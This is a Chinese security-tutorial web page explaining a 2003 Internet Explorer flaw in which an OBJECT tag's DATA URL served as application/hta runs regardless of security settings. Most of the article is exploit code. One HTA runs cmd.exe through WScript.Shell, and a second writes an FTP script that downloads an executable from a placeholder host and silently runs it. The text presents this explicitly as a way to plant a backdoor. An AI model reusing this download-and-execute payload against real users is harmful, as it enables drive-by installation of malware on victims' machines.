文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 | 设为首页 | 加入收藏
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网站建设 | 技术开发 | 专栏
当前位置:abcdown网络学院网络技术网络安全IE Object Data Remote Execution Vulnerability
精品广告
推荐TOP10
·网吧IP自动修改程序
·Windows权限设置详解
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
阅读TOP10
·恢复本来面目 消除JPEG图片马赛克
·netcat使用指南
·网吧IP自动修改程序
·Windows权限设置详解
·端口详解(1)-端口分配表
·利用X-scan实现DDoS Ping攻击
·Remote Administrator v2.1 配置文件
·命令行模式改变本地安全策略
·怎样让别人中木马-木马常用骗术大观
·端口详解(2)-端口的分类

IE Object Data Remote Execution Vulnerability

日期:2004年3月27日 作者:清风网络学院 查看:[大字体 中字体 小字体]


eEye Digital Security在8月20号公布了这个漏洞,该漏洞是由于HTML中的OBJECT的DATA标签引起的。对于DATA所标记的URL,IE会根据服务器返回的HTTP头中的Content-Type来处理数据,也就是说如果HTTP头中返回的是application/hta等。那么该文件就能够执行,而不管IE的安全级别多高。来看个例子,这里有两个文件。
--------------test.htm-----------------
<html>
<body>
This is a Test!
<object data="http://127.0.0.1/test.test"></object>
</body>
------------End of test.htm--------------

--------------test.test------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
wsh.Run("cmd.exe /k echo This is a test!")
</script>
</html>
------------End of test.test---------------
把test.test放在HTTP服务器的相应目录下,然后更改服务器的MIME映射为扩展名.test对应application/hta。用IE打开test.htm看看结果。我们可以更改test.test让它更有威力,可以让它先下载一个后门程序等,然后再运行它。看看这段代码。
---------------test.test---------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile("ftp.txt",true)
tf.Write "get xxx.exe"&chr(13)&chr(10)
tf.Write "bye"
tf.Close
wsh.Run "ftp.exe -A -s:ftp.txt 127.0.0.1", 0 ,true
wsh.Run "xxx.exe"
window.close
</script>
</html>
--------------------end of test.test------------------------
参考资料:
http://www.eeye.com/html/Research/Advisories/AD20030820.html
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp



上一篇:ASP网页模板的应用

下一篇:利用Microsoft.XMLHTTP控件发送COOKIE


相关软件: 相关文章:
·IE Object Data Remote Execution Vulnerability

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.abcdown.net
首页 | 本站声明 | 下载帮助 | 发布软件 |
中文版权所有:ABC学院 浙ICP备05000717号